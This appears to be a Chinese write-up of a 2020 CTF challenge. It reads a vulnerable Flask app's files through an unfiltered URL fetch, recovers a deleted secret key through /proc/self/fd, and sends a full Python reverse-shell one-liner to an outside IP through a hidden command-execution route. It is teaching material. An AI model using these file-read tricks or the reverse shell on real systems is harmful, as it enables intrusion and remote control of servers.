[网鼎杯 2020 白虎组]PicDown(任意文件读取)

 [网鼎杯 2020 白虎组]PicDown(任意文件读取)_第1张图片

打开界面发现有一个get传参然后,尝试任意文件读取漏洞,/etc/passwd看一下,提示下载了一个jpg图片然后

打不开只能用 010查看一下信息

[网鼎杯 2020 白虎组]PicDown(任意文件读取)_第2张图片 看来是猜对了,然后

 如果日记没删掉可以查看历史记录  .bash_history呃呃呃差不到,那就看一下现在的进程

读取当前进程执行命令/proc/self/cmdline

[网鼎杯 2020 白虎组]PicDown(任意文件读取)_第3张图片

python 2的app.py文件,直接读取

[网鼎杯 2020 白虎组]PicDown(任意文件读取)_第4张图片 

源码出来了,解析一下

 


from flask import Flask, Response
from flask import render_template
from flask import request
import os
import urllib

app = Flask(__name__)

SECRET_FILE = "/tmp/secret.txt"  //锁定文件目录
f = open(SECRET_FILE)  //直接打开文件
SECRET_KEY = f.read().strip() //读取
os.remove(SECRET_FILE)//然后删除文件
//注意这里没关闭文件就删除了


@app.route('/')
def index():
    return render_template('search.html')


@app.route('/page')
def page():
    url = request.args.get("url")
    try:
        if not url.lower().startswith("file"):
            res = urllib.urlopen(url)
            value = res.read()
            response = Response(value, mimetype='application/octet-stream')
            response.headers['Content-Disposition'] = 'attachment; filename=beautiful.jpg'
            return response
        else:
            value = "HACK ERROR!"
    except:
        value = "SOMETHING WRONG!"
    return render_template('search.html', res=value)


@app.route('/no_one_know_the_manager')  //这个路由下
def manager():
    key = request.args.get("key")//get传参
    print(SECRET_KEY)//输出,但显示不出来
    if key == SECRET_KEY://看看是否相等
        shell = request.args.get("shell")
        os.system(shell)//传参shell
        res = "ok"
    else:
        res = "Wrong Key!"

    return res


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8080)

@app.route('/no_one_know_the_manager')  //这个路由下
def manager():
    key = request.args.get("key")//get传参
    print(SECRET_KEY)//输出,但显示不出来
    if key == SECRET_KEY://看看是否相等
        shell = request.args.get("shell")
        os.system(shell)//传参shell
        res = "ok"
    else:
        res = "Wrong Key!"

    return res

这一块可以分析一下,我们需要获得SECRET_KEY的值,然后使key等于,最后shell进行命令执行,但是看完以后那个文件被删除了,我们怎么获得呢?

此处可以通过../../../proc/self/fd/读取,这个目录包含了进程打开的每一个文件的链接

后面这个3怎么来的呢,是自己一个个试的,也可以爆破出来 

[网鼎杯 2020 白虎组]PicDown(任意文件读取)_第5张图片

wLhTILlcJLljdKT/aHZn6BpfPLIqiC0a9udqLjaQRzA=

然后我们shell传一个python反弹shell的就可以

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('111.1.99.145',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

传的时候需要进行url编码

[网鼎杯 2020 白虎组]PicDown(任意文件读取)_第6张图片

[网鼎杯 2020 白虎组]PicDown(任意文件读取)_第7张图片 端口监听,然后切换目录找flag.

 

你可能感兴趣的:(rce命令执行,flask,python,后端)